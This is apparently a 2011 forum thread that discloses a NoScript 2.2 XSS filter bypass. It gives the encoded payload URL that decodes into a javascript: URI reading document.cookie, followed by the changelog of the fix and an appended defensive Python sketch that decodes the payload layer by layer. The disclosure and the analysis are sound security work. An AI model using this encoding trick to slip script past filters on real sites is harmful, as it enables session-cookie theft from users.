Nytro
Posted November 28, 2011

NoScript 2.2 XSS Filter Bypass

// NoScript 2.2 XSS Filter Bypass (fixed with 2.2.1rc1 and 2.2.1rc2 literally minutes after reporting)

// URL
test.php?xss=<a href="javascript%26colon;'%26percnt;3cscript%26percnt;3ealert%26lpar;document.cookie%26rpar;%26percnt;3c/script%26percnt;3e'">CLICKME

// Result
<a href="javascript:'%3cscript%3ealert(document.cookie)%3c/script%3e'">CLICKME

// After click
javascript:'<script>alert(document.cookie)</script>'

// JS URI runs in context of the referrer - cookie access (and more) is possible

Author: I don't know...
Source: http://pastebin.com/raw.php?i=W1q6BciY

Flubber
Posted November 29, 2011 (edited)

Fixed in 2.2.1:

NoScript CHANGELOG
[+] new feature, [x] bug fix, [-] removed feature, [=] repackaging or cosmetic change

v 2.2.1
==========================================================================
+ [Locale] Updated he-il (thanks baryoni)
x [ClearClick] Fixed incompatibility with the FoxTab add-on

v 2.2.1rc2
==========================================================================
+ [XSS] Deeper decoding on sanitization (thanks .mario for reporting)

v 2.2.1rc1
==========================================================================
+ [XSS] More accurate recursive decoding (thanks .mario for reporting)

Addendum: I didn't see that this was already specified in the raw paste on pastebin, sorry.

Edited November 29, 2011 by Flubber (sorry)
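
The changelog entries above mention "recursive decoding" and "deeper decoding on sanitization". As an added example (not NoScript's code and not from either poster), the sketch below decodes the quoted parameter value layer by layer until it stops changing and records the depth at which each signature first becomes visible. The signature set, the round limit and all function names are hypothetical.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample: the parameter value quoted in the first post.
SAMPLE = (
    "<a href=\"javascript%26colon;'%26percnt;3cscript%26percnt;3e"
    "alert%26lpar;document.cookie%26rpar;%26percnt;3c/script%26percnt;3e'\">CLICKME"
)

# Hypothetical signatures for illustration; a real filter checks far more.
SIGNATURES = {
    "javascript-uri": re.compile(r"javascript\s*:", re.I),
    "script-tag": re.compile(r"<\s*script", re.I),
}

MAX_ROUNDS = 8  # assumption: bound the work spent on deeply nested input


def decode_layers(value, max_rounds=MAX_ROUNDS):
    """Percent-decode then entity-decode repeatedly until nothing changes.

    Returns (forms, converged); forms[0] is the raw input.
    """
    forms = [value]
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(forms[-1]))
        if decoded == forms[-1]:
            return forms, True
        forms.append(decoded)
    return forms, False


def first_seen_depth(value):
    """Map each signature name to the first decoding depth where it matches."""
    forms, converged = decode_layers(value)
    hits = {}
    for depth, form in enumerate(forms):
        for name, pattern in SIGNATURES.items():
            if name not in hits and pattern.search(form):
                hits[name] = depth
    return hits, converged


if __name__ == "__main__":
    hits, converged = first_seen_depth(SAMPLE)
    for name, depth in sorted(hits.items(), key=lambda kv: kv[1]):
        print(f"{name}: visible after {depth} decoding round(s)")
    print("fully decoded" if converged else "round limit hit: treat as hostile")
```

Percent-decoding alone matches neither signature on this input; the entity layer has to be unwrapped as well, and the script tag only appears one round later, which is why a sanitizer has to inspect every intermediate form rather than a single decoded pass.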